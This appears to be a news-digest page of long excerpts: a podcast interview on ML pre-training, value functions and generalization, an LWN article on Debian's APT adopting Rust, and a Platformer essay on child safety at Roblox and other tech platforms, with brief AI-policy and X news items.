With this analogy, I think it’s more intuitive. Yeah, okay, if it’s so well trained, all the different algorithms and all the different proof techniques are right at its fingertips. And it’s more intuitive that with this level of preparation, it would not necessarily generalize to other things.
But then what is the analogy for what the second student is doing before they do the 100 hours of fine-tuning?
I think they have “it.” The “it” factor. When I was an undergrad, I remember there was a student like this that studied with me, so I know it exists.
I think it’s interesting to distinguish “it” from whatever pre-training does. One way to understand what you just said about not having to choose the data in pre-training is to say it’s actually not dissimilar to the 10,000 hours of practice. It’s just that you get that 10,000 hours of practice for free because it’s already somewhere in the pre-training distribution. But maybe you’re suggesting there’s actually not that much generalization from pre-training. There’s just so much data in pre-training, but it’s not necessarily generalizing better than RL.
The main strength of pre-training is that: A, there is so much of it, and B, you don’t have to think hard about what data to put into pre-training. It’s very natural data, and it does include in it a lot of what people do: people’s thoughts and a lot of the features. It’s like the whole world as projected by people onto text, and pre-training tries to capture that using a huge amount of data.
Pre-training is very difficult to reason about because it’s so hard to understand the manner in which the model relies on pre-training data. Whenever the model makes a mistake, could it be because something by chance is not as supported by the pre-training data? “Support by pre-training” is maybe a loose term. I don’t know if I can add anything more useful on this. I don’t think there is a human analog to pre-training.
Here are analogies that people have proposed for what the human analogy to pre-training is. I’m curious to get your thoughts on why they’re potentially wrong. One is to think about the first 18, or 15, or 13 years of a person’s life when they aren’t necessarily economically productive, but they are doing something that is making them understand the world better and so forth. The other is to think about evolution as doing some kind of search for 3 billion years, which then results in a human lifetime instance.
I’m curious if you think either of these are analogous to pre-training. How would you think about what lifetime human learning is like, if not pre-training?
I think there are some similarities between both of these and pre-training, and pre-training tries to play the role of both of these. But I think there are some big differences as well. The amount of pre-training data is very, very staggering.
Somehow a human being, after even 15 years with a tiny fraction of the pre-training data, they know much less. But whatever they do know, they know much more deeply somehow. Already at that age, you would not make mistakes that our AIs make.
There is another thing. You might say, could it be something like evolution? The answer is maybe. But in this case, I think evolution might actually have an edge. I remember reading about this case. One way in which neuroscientists can learn about the brain is by studying people with brain damage to different parts of the brain. Some people have the most strange symptoms you could imagine. It’s actually really, really interesting.
One case that comes to mind that’s relevant. I read about this person who had some kind of brain damage, a stroke or an accident, that took out his emotional processing. So he stopped feeling any emotion. He still remained very articulate and he could solve little puzzles, and on tests he seemed to be just fine. But he felt no emotion. He didn’t feel sad, he didn’t feel anger, he didn’t feel animated. He became somehow extremely bad at making any decisions at all. It would take him hours to decide on which socks to wear. He would make very bad financial decisions.
What does it say about the role of our built-in emotions in making us a viable agent, essentially? To connect to your question about pre-training, maybe if you are good enough at getting everything out of pre-training, you could get that as well. But that’s the kind of thing which seems… Well, it may or may not be possible to get that from pre-training.
What is “that”? Clearly not just directly emotion. It seems like some almost value function-like thing which is telling you what the end reward for any decision should be. You think that doesn’t sort of implicitly come from pre-training?
I think it could. I’m just saying it’s not 100% obvious.
But what is that? How do you think about emotions? What is the ML analogy for emotions?
It should be some kind of a value function thing. But I don’t think there is a great ML analogy because right now, value functions don’t play a very prominent role in the things people do.
It might be worth defining for the audience what a value function is, if you want to do that.
Certainly, I’ll be very happy to do that. When people do reinforcement learning, the way reinforcement learning is done right now, how do people train those agents? You have your neural net and you give it a problem, and then you tell the model, “Go solve it.” The model takes maybe thousands, hundreds of thousands of actions or thoughts or something, and then it produces a solution. The solution is graded.
And then the score is used to provide a training signal for every single action in your trajectory. That means that if you are doing something that goes for a long time—if you’re training a task that takes a long time to solve—it will do no learning at all until you come up with the proposed solution. That’s how reinforcement learning is done naively. That’s how o1, R1 ostensibly are done.
The value function says something like, “Maybe I could sometimes, not always, tell you if you are doing well or badly.” The notion of a value function is more useful in some domains than others. For example, when you play chess and you lose a piece, you know, “I messed up.” You don’t need to play the whole game to know that what I just did was bad, and therefore whatever preceded it was also bad.
The value function lets you short-circuit the wait until the very end. Let’s suppose that you are doing some kind of a math thing or a programming thing, and you’re trying to explore a particular solution or direction. After, let’s say, a thousand steps of thinking, you concluded that this direction is unpromising. As soon as you conclude this, you could already get a reward signal a thousand timesteps previously, when you decided to pursue down this path. You say, “Next time I shouldn’t pursue this path in a similar situation,” long before you actually came up with the proposed solution.
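An illustrative aside (notation added here, not from the conversation): the short-circuiting described above is what a standard temporal-difference update does,

$$
V(s_t) \leftarrow V(s_t) + \alpha \left[ r_{t+1} + \gamma V(s_{t+1}) - V(s_t) \right],
$$

where the value estimate at step t is nudged toward the immediate reward plus the discounted estimate one step later, so a bad decision (like losing a piece in chess) can be penalized long before the final outcome is known.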
This was in the DeepSeek R1 paper—that the space of trajectories is so wide that maybe it’s hard to learn a mapping from an intermediate trajectory to a value. And also given that, in coding for example you’ll have the wrong idea, then you’ll go back, then you’ll change something.
This sounds like such a lack of faith in deep learning. Sure it might be difficult, but nothing deep learning can’t do. My expectation is that a value function should be useful, and I fully expect that they will be used in the future, if not already.
What I was alluding to with the person whose emotional center got damaged, it’s more that maybe what it suggests is that the value function of humans is modulated by emotions in some important way that’s hardcoded by evolution. And maybe that is important for people to be effective in the world.
That’s the thing I was planning on asking you. There’s something really interesting about emotions as a value function, which is that it’s impressive that they have this much utility while still being rather simple to understand.
I have two responses. I do agree that compared to the kind of things that we learn and the things we are talking about, the kind of AI we are talking about, emotions are relatively simple. They might even be so simple that maybe you could map them out in a human-understandable way. I think it would be cool to do.
In terms of utility though, I think there is a thing where there is this complexity-robustness tradeoff, where complex things can be very useful, but simple things are very useful in a very broad range of situations. One way to interpret what we are seeing is that we’ve got these emotions that evolved mostly from our mammal ancestors and then fine-tuned a little bit while we were hominids, just a bit. We do have a decent amount of social emotions though which mammals may lack. But they’re not very sophisticated. And because they’re not sophisticated, they serve us so well in this very different world compared to the one that we’ve been living in.
Actually, they also make mistakes. For example, our emotions… Well actually, I don’t know. Does hunger count as an emotion? It’s debatable. But I think, for example, our intuitive feeling of hunger is not succeeding in guiding us correctly in this world with an abundance of food.
People have been talking about scaling data, scaling parameters, scaling compute. Is there a more general way to think about scaling? What are the other scaling axes?
Here’s a perspective that I think might be true. The way ML used to work is that people would just tinker with stuff and try to get interesting results. That’s what’s been going on in the past.
Then the scaling insight arrived. Scaling laws, GPT-3, and suddenly everyone realized we should scale. This is an example of how language affects thought. “Scaling” is just one word, but it’s such a powerful word because it informs people what to do. They say, “Let’s try to scale things.” So you say, what are we scaling? Pre-training was the thing to scale. It was a particular scaling recipe.
The big breakthrough of pre-training is the realization that this recipe is good. You say, “Hey, if you mix some compute with some data into a neural net of a certain size, you will get results. You will know that you’ll be better if you just scale the recipe up.” This is also great. Companies love this because it gives you a very low-risk way of investing your resources.
It’s much harder to invest your resources in research. Compare that. If you research, you need to be like, “Go forth researchers and research and come up with something”, versus get more data, get more compute. You know you’ll get something from pre-training.
Indeed, based on various things some people say on Twitter, it appears that Gemini has found a way to get more out of pre-training. At some point though, pre-training will run out of data. The data is very clearly finite. What do you do next? Either you do some kind of souped-up pre-training, a different recipe from the one you’ve done before, or you’re doing RL, or maybe something else. But now that compute is big, compute is now very big, in some sense we are back to the age of research.
Maybe here’s another way to put it. Up until 2020, from 2012 to 2020, it was the age of research. Now, from 2020 to 2025, it was the age of scaling—maybe plus or minus, let’s add error bars to those years—because people say, “This is amazing. You’ve got to scale more. Keep scaling.” The one word: scaling.
But now the scale is so big. Is the belief really, “Oh, it’s so big, but if you had 100x more, everything would be so different?” It would be different, for sure. But is the belief that if you just 100x the scale, everything would be transformed? I don’t think that’s true. So it’s back to the age of research again, just with big computers.
That’s a very interesting way to put it. But let me ask you the question you just posed then. What are we scaling, and what would it mean to have a recipe? I guess I’m not aware of a very clean relationship that almost looks like a law of physics which existed in pre-training. There was a power law between data or compute or parameters and loss. What is the kind of relationship we should be seeking, and how should we think about what this new recipe might look like?
We’ve already witnessed a transition from one type of scaling to a different type of scaling, from pre-training to RL. Now people are scaling RL. Now based on what people say on Twitter, they spend more compute on RL than on pre-training at this point, because RL can actually consume quite a bit of compute. You do very long rollouts, so it takes a lot of compute to produce those rollouts. Then you get a relatively small amount of learning per rollout, so you really can spend a lot of compute.
I wouldn’t even call it scaling. I would say, “Hey, what are you doing? Is the thing you are doing the most productive thing you could be doing? Can you find a more productive way of using your compute?” We’ve discussed the value function business earlier. Maybe once people get good at value functions, they will be using their resources more productively. If you find a whole other way of training models, you could say, “Is this scaling or is it just using your resources?” I think it becomes a little bit ambiguous.
In the sense that, when people were in the age of research back then, it was, “Let’s try this and this and this. Let’s try that and that and that. Oh, look, something interesting is happening.” I think there will be a return to that.
If we’re back in the era of research, stepping back, what is the part of the recipe that we need to think most about? When you say value function, people are already trying the current recipe, but then having LLM-as-a-Judge and so forth. You could say that’s a value function, but it sounds like you have something much more fundamental in mind. Should we even rethink pre-training at all and not just add more steps to the end of that process?
The discussion about value function, I think it was interesting. I want to emphasize that I think the value function is something that’s going to make RL more efficient, and I think that makes a difference. But I think anything you can do with a value function, you can do without, just more slowly. The thing which I think is the most fundamental is that these models somehow just generalize dramatically worse than people. It’s super obvious. That seems like a very fundamental thing.
So this is the crux: generalization. There are two sub-questions. There’s one which is about sample efficiency: why should it take so much more data for these models to learn than humans? There’s a second question. Even separate from the amount of data it takes, why is it so much harder to teach a model what we want than to teach a human? For a human, we don’t necessarily need a verifiable reward to be able to… You’re probably mentoring a bunch of researchers right now, and you’re talking with them, you’re showing them your code, and you’re showing them how you think. From that, they’re picking up your way of thinking and how they should do research.
You don’t have to set a verifiable reward for them that’s like, “Okay, this is the next part of the curriculum, and now this is the next part of your curriculum. Oh, this training was unstable.” There’s not this schleppy, bespoke process. Perhaps these two issues are actually related in some way, but I’d be curious to explore this second thing, which is more like continual learning, and this first thing, which feels just like sample efficiency.
You could wonder whether one possible explanation for human sample efficiency is evolution. Evolution has given us a small amount of the most useful information possible. For things like vision, hearing, and locomotion, I think there’s a pretty strong case that evolution has given us a lot.
For example, human dexterity far exceeds… I mean, robots can become dexterous too if you subject them to a huge amount of training in simulation. But training a robot in the real world to quickly pick up a new skill the way a person does seems very out of reach. Here you could say, “Oh yeah, locomotion. All our ancestors, squirrels included, needed great locomotion. So with locomotion, maybe we’ve got some unbelievable prior.”
You could make the same case for vision. I believe Yann LeCun made the point that children learn to drive after 10 hours of practice, which is true. But our vision is so good. At least for me, I remember myself being a five-year-old. I was very excited about cars back then. I’m pretty sure my car recognition was more than adequate for driving already as a five-year-old. You don’t get to see that much data as a five-year-old. You spend most of your time in your parents’ house, so you have very low data diversity.
But you could say maybe that’s evolution too. But in language and math and coding, probably not.
It still seems better than models. Obviously, models are better than the average human at language, math, and coding. But are they better than the average human at learning?
Oh yeah. Oh yeah, absolutely. What I meant to say is that language, math, and coding—and especially math and coding—suggests that whatever it is that makes people good at learning is probably not so much a complicated prior, but something more, some fundamental thing.
I’m not sure I understood. Why should that be the case?
So consider a skill in which people exhibit some kind of great reliability. If the skill is one that was very useful to our ancestors for many millions of years, hundreds of millions of years, you could argue that maybe humans are good at it because of evolution, because we have a prior, an evolutionary prior that’s encoded in some very non-obvious way that somehow makes us so good at it.
But if people exhibit great ability, reliability, robustness, and ability to learn in a domain that really did not exist until recently, then this is more an indication that people might have just better machine learning, period.
How should we think about what that is? What is the ML analogy? There are a couple of interesting things about it. It takes fewer samples. It’s more unsupervised. A child learning to drive a car… Children are not learning to drive a car. A teenager learning how to drive a car is not exactly getting some prebuilt, verifiable reward. It comes from their interaction with the machine and with the environment. It takes far fewer samples. It seems more unsupervised. It seems more robust?
Much more robust. The robustness of people is really staggering.
Do you have a unified way of thinking about why all these things are happening at once? What is the ML analogy that could realize something like this?
One of the things that you’ve been asking about is how can the teenage driver self-correct and learn from their experience without an external teacher? The answer is that they have their value function. They have a general sense which is also, by the way, extremely robust in people. Whatever the human value function is, with a few exceptions around addiction, it’s actually very, very robust.
So for something like a teenager learning to drive, they start to drive, and they immediately have a sense of how they’re driving, how badly they’re doing, how unconfident they feel. And then they see, “Okay.” And then, of course, the learning speed of any teenager is so fast. After 10 hours, you’re good to go.
It seems like humans have some solution, but I’m curious about how they are doing it and why is it so hard? How do we need to reconceptualize the way we’re training models to make something like this possible?
That is a great question to ask, and it’s a question I have a lot of opinions about. But unfortunately, we live in a world where not all machine learning ideas are discussed freely, and this is one of them. There’s probably a way to do it. I think it can be done. The fact that people are like that, I think it’s a proof that it can be done.
There may be another blocker though, which is that there is a possibility that the human neurons do more compute than we think. If that is true, and if that plays an important role, then things might be more difficult. But regardless, I do think it points to the existence of some machine learning principle that I have opinions on. But unfortunately, circumstances make it hard to discuss in detail.
Nobody listens to this podcast, Ilya.
I’m curious. If you say we are back in an era of research, you were there from 2012 to 2020. What is the vibe now going to be if we go back to the era of research?
For example, even after AlexNet, the amount of compute that was used to run experiments kept increasing, and the size of frontier systems kept increasing. Do you think now that this era of research will still require tremendous amounts of compute? Do you think it will require going back into the archives and reading old papers?
You were at Google and OpenAI and Stanford, these places, when there was more of a vibe of research? What kind of things should we be expecting in the community?
One consequence of the age of scaling is that scaling sucked out all the air in the room. Because scaling sucked out all the air in the room, everyone started to do the same thing. We got to the point where we are in a world where there are more companies than ideas by quite a bit. Actually on that, there is this Silicon Valley saying that says that ideas are cheap, execution is everything. People say that a lot, and there is truth to that. But then I saw someone say on Twitter something like, “If ideas are so cheap, how come no one’s having any ideas?” And I think it’s true too.
If you think about research progress in terms of bottlenecks, there are several bottlenecks. One of them is ideas, and one of them is your ability to bring them to life, which might be compute but also engineering. If you go back to the ’90s, let’s say, you had people who had pretty good ideas, and if they had much larger computers, maybe they could demonstrate that their ideas were viable. But they could not, so they could only have a very, very small demonstration that did not convince anyone. So the bottleneck was compute.
Then in the age of scaling, compute has increased a lot. Of course, there is a question of how much compute is needed, but compute is large. Compute is large enough such that it’s not obvious that you need that much more compute to prove some idea. I’ll give you an analogy. AlexNet was built on two GPUs. That was the total amount of compute used for it. The transformer was built on 8 to 64 GPUs. No single transformer paper experiment used more than 64 GPUs of 2017, which would be like, what, two GPUs of today? The ResNet, right? You could argue that the o1 reasoning was not the most compute-heavy thing in the world.
...
Read the original on www.dwarkesh.com »
It is rarely newsworthy when a project or package picks up a new dependency. However, changes in a core tool like Debian’s Advanced Package Tool (APT) can have far-reaching effects. For example, Julian Andres Klode’s declaration that APT would require Rust in May 2026 means that a few of Debian’s unofficial ports must either acquire a working Rust toolchain or depend on an old version of APT. This has raised several questions within the project, particularly about the ability of a single maintainer to make changes that have widespread impact.
On October 31, Klode sent an announcement to the debian-devel mailing list that he intended to introduce Rust dependencies and code into APT as soon as May 2026:
This extends at first to the Rust compiler and standard library, and the Sequoia ecosystem.
In particular, our code to parse .deb, .ar, .tar, and the HTTP signature verification code would strongly benefit from memory safe languages and a stronger approach to unit testing.
If you maintain a port without a working Rust toolchain, please ensure it has one within the next 6 months, or sunset the port.
Klode added that this was necessary so that the project as a whole could move forward, rely on modern technologies, “and not be held back by trying to shoehorn modern software on retro computing devices”. Some Debian developers have welcomed the news. Paul Tagliamonte acknowledged that it would impact unofficial Debian ports, but supported the push toward Rust.
However, John Paul Adrian Glaubitz complained that Klode’s wording was unpleasant and that the approach was confrontational. In another message, he explained that he was not against adoption of Rust; he had worked on enabling Rust on many of the Debian architectures and helped to fix architecture-specific bugs in the Rust toolchain as well as LLVM upstream. However, Klode’s message strongly suggested there was no room for a change in plan, and it closed in a way that invited no further discussion. Glaubitz was one of a few Debian developers who expressed discomfort with Klode’s communication style in the message.
Klode noted, briefly, that Rust was already a hard requirement for all Debian release architectures and ports, except for Alpha (alpha), Motorola 680x0 (m68k), PA-RISC (hppa), and SuperH (sh4), because of APT’s use of the Sequoia-PGP project’s sqv tool to verify OpenPGP signatures. APT falls back to GNU Privacy Guard’s signature-verification tool, gpgv, on ports that do not have a Rust compiler. By depending directly on Rust, though, APT itself would not be available on ports without a Rust compiler. LWN recently covered the state of Linux architecture support, and the status of Rust support for each one.
None of the ports listed by Klode are among those officially supported by Debian today, or targeted for support in Debian 14 (“forky”). The sh4 port has never been officially supported, and none of the other ports have been supported since Debian 6.0. The actual impact on the ports lacking Rust is also less dramatic than it sounded at first. Glaubitz assured Antoni Boucher that the situation is less dire than the announcement made it sound, but that phrasing it that way “gets more attention in the news”. Boucher is the maintainer of rustc_codegen_gcc, a GCC ahead-of-time code generator for Rust. Nothing, Glaubitz said, stops ports from using a non-Rust version of APT until Boucher and others manage to bootstrap Rust for those ports.
David Kalnischkies, who is also a major contributor to APT, suggested that if the goal is to reduce bugs, it would be better to remove the code that parses the .deb, .ar, and .tar formats that Klode mentioned from APT entirely. It is only needed for two auxiliary tools, he said, and the only serious use of one of those was by Klode’s employer, Canonical, for its Launchpad software-collaboration platform. If those tools were taken out of the main APT code base, then it would not matter whether they were written in Rust, Python, or another language, since they are not directly necessary for any given port.
Kalnischkies also questioned the claim that Rust was necessary to achieve the stronger approach to unit testing that Klode mentioned:
You can certainly do unit tests in C++, we do. The main problem is that someone has to write those tests. Like docs.
Your new solver e.g. has none (apart from our preexisting integration tests). You don’t seriously claim that is because of C++ ? If you don’t like GoogleTest, which is what we currently have, I could suggest doctest (as I did in previous installments). Plenty other frameworks exist with similar or different styles.
Klode has not responded to those comments yet, which is a bit unfortunate given that introducing hard dependencies on Rust has an impact beyond his own work on APT. It may well be that he has good answers to the questions, but the silence can also give the impression that Klode is simply embracing a trend toward Rust. He is involved in the Ubuntu work to migrate from GNU Coreutils to the Rust-based uutils. The reasons given for that work, again, are around modernization and better security, but security is not automatically guaranteed simply by switching to Rust, and there are a number of other considerations.
For example, Adrian Bunk pointed out that there are a number of Debian teams, as well as tooling, that will be impacted by writing some of APT in Rust. The release notes for Debian 13 (“trixie”) mention that Debian’s infrastructure “currently has problems with rebuilding packages of types that systematically use static linking”, such as those with code written in Go and Rust. Thus, “these packages will be covered by limited security support until the infrastructure is improved to deal with them maintainably”. Limited security support means that updates to Rust libraries are likely to only be released when Debian publishes a point release, which happens about every two months. The security team has specifically stated that APT is fully supported, but there are still outstanding problems.
Due to the static-linking issue, any time one of sqv’s dependencies, currently more than 40 Rust crates, has to be rebuilt due to a security issue, sqv (at least potentially) also needs to be rebuilt. There are also difficulties in tracking CVEs for all of its dependencies, and in understanding when a security vulnerability in a Rust crate requires updating a Rust program that depends on it.
Fabian Grünbichler, a maintainer of Debian’s Rust toolchain, listed several outstanding problems Debian has in dealing with Rust packages. One of the largest is the need for a consistent Debian policy for declaring statically linked libraries. In 2022, Guillem Jover added a control field for Debian packages called Static-Built-Using (SBU), which lists the source packages used to build a binary package. This indicates when a binary package needs to be rebuilt due to an update in another source package. For example, sqv depends on more than 40 Rust crates that are packaged for Debian; without declaring the SBUs, it may not be clear whether sqv needs to be updated when one of its dependencies is updated. Debian has been working on a policy requirement for SBU since April 2024, but it is not yet finished or adopted.
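As a rough illustration of what such a declaration looks like (the crate list and version numbers here are invented for the example, not copied from the archive), a statically linked Rust binary package would enumerate the crate source packages baked into it in its control stanza:

  Package: sqv
  Architecture: amd64
  Static-Built-Using: rust-anyhow (= 1.0.86-1),
   rust-clap (= 4.5.4-1),
   rust-sequoia-openpgp (= 1.21.0-1)

With that information recorded, archive tooling can tell which binary packages need a rebuild when, say, one of those crates receives a security update.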
The discussion sparked by Grünbichler makes clear that most of Debian’s Rust-related problems are in the process of being solved. However, there’s no evidence that Klode explored the problems before declaring that APT would depend on Rust, or even asked “is this a reasonable time frame to introduce this dependency?”
Debian’s tagline, or at least one of its taglines, is “the universal operating system”, meaning that the project aims to run on a wide variety of hardware (old and new) and be usable on the desktop, server, IoT devices, and more. The “Why Debian” page lists a number of reasons users and developers should choose the distribution: multiple hardware architectures, long-term support, and its democratic governance structure are just a few of the arguments it puts forward in favor of Debian. It also notes that “Debian cannot be controlled by a single company”. When a single developer employed by a company to work on Debian tools pushes a change that seems to benefit that company, without discussion or debate, and that change impacts multiple hardware architectures and requires other volunteers to do unplanned work or meet an artificial deadline, it seems to go against many of the project’s stated values.
Debian, of course, does have checks and balances that could be employed if other Debian developers feel it necessary. Someone could, for example, appeal to Debian’s Technical Committee, or sponsor a general resolution to override a developer if they cannot be persuaded by discussion alone. That happened recently when the committee required the systemd maintainers to keep providing a directory “until a satisfactory migration of impacted software has occurred and Policy updated accordingly”.
However, it also seems fair to point out that Debian can move slowly, even glacially, at times. APT added support for the DEB822 format for its source-information lists in 2015. Despite APT supporting the format for years, Klode faced resistance when he pushed for Debian to move to it ahead of the Debian 12 (“bookworm”) release in 2021, and was unsuccessful. It is now the default for trixie with the move to APT 3.0, though APT will continue to support the old format for years to come.
The fact is, regardless of what Klode does with APT, more and more free software is being written (or rewritten) in Rust. Making it easier to support that software when it is packaged for Debian is to everyone’s benefit. Perhaps the project needs some developers who will be aggressive about pushing it to move more quickly in improving its support for Rust. However, what is really needed is more developers lending a hand to do the work that is needed to support Rust in Debian and elsewhere, such as the rustc_codegen_gcc effort. It does not seem in keeping with Debian’s community focus for a single developer to simply declare dependencies that other volunteers will have to scramble to support.
...
Read the original on lwn.net »
What is the role of tech journalism in a world where CEOs no longer feel shame?
On Friday, the Hard Fork team published our interview with Roblox CEO David Baszucki. In the days since, it has become the most-discussed interview we’ve done in three years on the show. Listeners who wrote in to us said they were shocked to hear the leader of a platform with 151.5 million monthly users, most of them minors, express frustration and annoyance at being asked about the company’s history of failures related to child safety. Journalists described the interview as “bizarre,” “unhinged,” and a “car crash.”
And a case can be made that it was all of those things — even if Baszucki, in the studio afterwards and later on X, insisted to us that he had had a good time. In the moment, though, Baszucki’s dismissive attitude toward discussing child safety struck me as something worse: familiar.
Baszucki, after all, is not the first CEO to have insisted to me that a platform’s problems are smaller than I am making them out to be. Nor is he the first to blame the platform’s enormous scale, or to try to change the subject. (He is the first tech CEO to suggest to me that maybe there should be prediction markets in video games for children, but that’s another story.)
What people found noteworthy about our interview, I think, was the fresh evidence that our most successful tech CEOs really do think and talk this way. Given a chance to display empathy for the victims of crimes his platform enabled, or to convey regret about historical safety lapses, or even just to gesture at some sense of responsibility for the hundreds of millions of children who in various ways are depending on him, the CEO throws up his hands and asks: how long are you guys going to be going on about all this stuff?
Roblox is different from other social products in that it explicitly courts users as young as 5. (You are supposed to be at least 13 to use Instagram, TikTok, and other major platforms.) That has always put significant pressure on the company to develop serious safety features. The company says it spends hundreds of millions of dollars a year on safety, and that 10 percent of its employees work on trust and safety issues. And trust and safety workers I know tell me that they respect Roblox’s safety teams.
At the same time, this is a platform launched in 2006 where, for most of its history, adults could freely approach and message any minor unless their parents had dug into the app settings. Roblox did not verify users’ ages, letting any child identify as 13 or older to bypass content restrictions. Filters intended to prevent inappropriate chat or the exchange of personal information were easily bypassed by slightly changing the spelling of words. Parental controls could be circumvented simply by a child creating a new account and declaring that they were at least 13.
Last year the company introduced new restrictions on chat. And this year, the company said it would deploy its own age estimation technology to determine users’ ages and restrict the content available to them accordingly. This rollout was the main reason we had sought to interview Baszucki in the first place — something we had communicated to his team.
Which only made it stranger when Baszucki expressed surprise at our line of inquiry and threw his PR team under the bus. (“If our PR people said, ‘Let’s talk about age-gating for an hour,’ I’m up for it, but I love your pod. I thought I came here to talk about everything,” he said.)
Since 2018, at least two dozen people in the United States have been arrested and accused of abducting or abusing victims they met on Roblox, according to a 2024 investigation by Bloomberg. Attorneys general in Texas, Kentucky, and Louisiana have filed lawsuits against Roblox alleging that the platform facilitates child exploitation and grooming. More than 35 families have filed lawsuits against the company over child predation.
As recently as this month, a reporter for the Guardian created an account presenting herself as a child and found that in Roblox she could wander user-created strip clubs, casinos, and horror games. In one “hangout” game, in which she identified as a 13-year-old, another avatar sexually assaulted her by thrusting his hips into her avatar’s face as she begged him to leave her alone.
It’s true that any platform that lets strangers communicate will lead to real-world harm. I believe that millions of children use Roblox daily without incident. And we would not want to shut down the entire internet to prevent a single bad thing from ever happening.
But there is much a leader can do with the knowledge that his platform will inevitably lead to harm, should he wish.
Understanding how attractive Roblox would be to predators, the company long ago could have blocked unrestricted contact between adults and minors. It could have adopted age verification before a wave of state legislation signaled that it would soon become mandatory anyway. It could have made it harder for children under 13 to create new accounts, and required them to get parental consent in a way it could verify.
But doing so would require Roblox to focus on outcomes for children, at the likely expense of growth. And so here we are.
Galling? Yes. But like I said: it’s also familiar.
Over and over again, we have seen leaders in Baszucki’s position choose growth over guardrails. Safety features come out years after the need for them is identified, if at all. Internal critics are sidelined, laid off, or managed out. And when journalists ask, politely but insistently, why so many of their users are suffering, executives laugh and tell us that we’re the crazy ones.
Look at OpenAI, where the company is reckoning with the fact that making its models less sycophantic has been worse for user engagement — and is building new features to turn the engagement dial back up.
Look at TikTok, which has answered concerns that short-form video is worsening academic performance for children with new “digital well-being features” that include an affirmation journal, a “background sound generator aimed at improving the mental health of its users,” and “new badges to reward people who use the platform within limits, especially teens.” Answering concerns that teens are using the app too much with more reasons to use the app.
Or look at Meta, where new court filings from over the weekend allege … a truly staggering number of things. To name a few: the company “stalled internal efforts to prevent child predators from contacting minors for years due to growth concerns,” according to Jeff Horwitz in Reuters; “recognized that optimizing its products to increase teen engagement resulted in serving them more harmful content, but did so anyway”; and gave users 17 attempts to traffic people for sex before banning their accounts. (Meta denies the allegations, which are drawn from internal documents that have not been made public; Meta has also objected to unsealing the documents.)
Lawsuits will always contain the most salacious allegations lawyers can find, of course. But what struck me about these latest filings is not the lawyers’ predictably self-serving framing but rather the quotes from Meta’s own employees.
When the company declined to publish internal research from 2019 which showed that no longer looking at Facebook and Instagram improved users’ mental health, one employee said: “If the results are bad and we don’t publish and they leak … is it going to look like tobacco companies doing research and knowing cigs were bad and then keeping that info to themselves?”
When Meta researchers found that by 2018, approximately 40 percent of children ages 9 to 12 were daily Instagram users — despite the fact that you are supposed to be 13 to join — some employees bristled at what they perceived as tacit encouragement from executives to accelerate growth efforts among children.
“Oh good,” one employee wrote, according to Time’s account of the brief. “Zuck has been talking about that for a while…targeting 11 year olds feels like tobacco companies a couple decades ago (and today). Like we’re seriously saying ‘we have to hook them young’ here.”
When Meta studied the potential of its products to be addictive in 2018, it found that 55 percent of 20,000 surveyed users showed at least some signs of “problematic use.” When it published that research the following year, though, it redefined “problematic use” to include only the most severe cases — 3.1 percent of users.
“Because our product exploits weaknesses in the human psychology to promote product engagement and time spent,” a user experience researcher wrote, the company should “alert people to the effect that the product has on their brain.”
You will not be surprised to learn that the company did not alert people to the issue.
As usual, the rank-and-file employees are doing their job. Over and over again, though, their boss’ boss tells them to stop.
The thing is, platforms’ strategy of delay, deny and deflect mostly works.
Americans have short attention spans — and lots to worry about. The tech backlash that kicked off in 2017 inspired platforms to make meaningful and effective investments in content moderation, cybersecurity, platform integrity, and other teams that worked to protect their user bases. Imperfect as these efforts were, they bolstered my sense that tech platforms were susceptible to pressure from the public, from lawmakers and from journalists. They acted slowly, and incompletely, but at least they acted.
Fast forward to today and the bargain no longer holds. Platforms do whatever the president of the United States tells them to do, and very little else. Shame, that once-great regulator of social norms and executive behavior, has all but disappeared from public life. In its place is denial, defiance, and the noxious vice signaling of the investor class.
I’m still reckoning with what it means to do journalism in a world where the truth can barely hold anyone’s attention — much less hold a platform accountable, in any real sense of that word. I’m rethinking how to cover tech policy at a time when it is being made by whim. I’m noticing the degree to which platforms wish to be judged only by their stated intentions, and almost never on the outcomes of anyone who uses them.
In the meantime the platforms hurtle onward, pitching ever-more fantastical visions of the future while seeming barely interested in stewarding the present.
For the moment, I’m grateful that a car-crash interview drew attention to one CEO’s exasperation with being asked about that. But the real problem isn’t that David Baszucki talks this way. It’s that so many of his peers do, too.
The BBC caught scam call center workers on hidden cameras as they laughed at the people they were tricking.
One worker bragged about making $250k from victims. The disturbing truth?
Scammers don’t pick phone numbers at random. They buy your data from brokers.
Once your data is out there, it’s not just calls. It’s phishing, impersonation, and identity theft.
That’s why we recommend Incogni: They delete your info from the web, monitor and follow up automatically, and continue to erase data as new risks appear.
Black Friday deal: Try Incogni here and get 55% off your subscription with code PLATFORMER
What happened: Facing criticism from both parties, the Trump administration backed down from issuing an executive order that would have effectively placed a moratorium on state AI regulations, Reuters reported.
The order would have fought state regulations by withholding federal funding and establishing an “AI Litigation Task Force” to “challenge State AI laws.”
Why we’re following: Last week we covered the draft executive order and how Trump’s attempts to squash state AI regulation have drawn bipartisan backlash, and have made Republicans increasingly sympathetic to the views of AI safety advocates.
It’s always hard to guess when Trump’s instinct to do as he pleases will be thwarted by political opposition. In this case, though, the revived moratorium had little support outside the David Sacks wing of the party. And so — for now, anyway — it fell apart.
What people are saying: State lawmakers are fighting the moratorium proposal Trump made to Congress. Today, a letter signed by 280 state lawmakers urged Congress to “reject any provision that overrides state and local AI legislation.”
A moratorium would threaten existing laws that “strengthen consumer transparency, guide responsible government procurement, protect patients, and support artists and creators,” the letter said.
On the other side of the debate, the tech-funded industry PAC Leading the Future announced a $10 million campaign to push Congress to pass national AI regulations that would supersede state law.
What happened: On Friday, X debuted its About This Account feature globally in a rollout that descended into chaos over the feature’s accidental uncovering of foreign actors behind popular right-wing accounts that actively share news on US politics.
X users can now see the date an account joined the platform, how many times it has changed its username, and most importantly, the country or region it’s based in. The move, according to X head of product Nikita Bier, “is an important first step to securing the integrity of the global town square.”
But the feature has had an unintended consequence: it revealed that big pro-Trump accounts like @MAGANationX, a right-wing user with nearly 400,000 followers that regularly shares news about US politics, aren’t actually based in the US. MAGANationX, for example, is based in Eastern Europe, according to X.
Other popular right-wing accounts — that use names from the Trump family — like @IvankaNews_ (1 million followers before it was suspended), @BarronTNews (nearly 600,000 followers), and @TrumpKaiNews (more than 11,000 followers), appear to be based in Nigeria, Eastern Europe, and Macedonia respectively.
The data could be skewed by travel, VPNs, or old IP addresses, and some have complained their location is inaccurate. Bier said the rollout has “a few rough edges” that will be resolved by Tuesday.
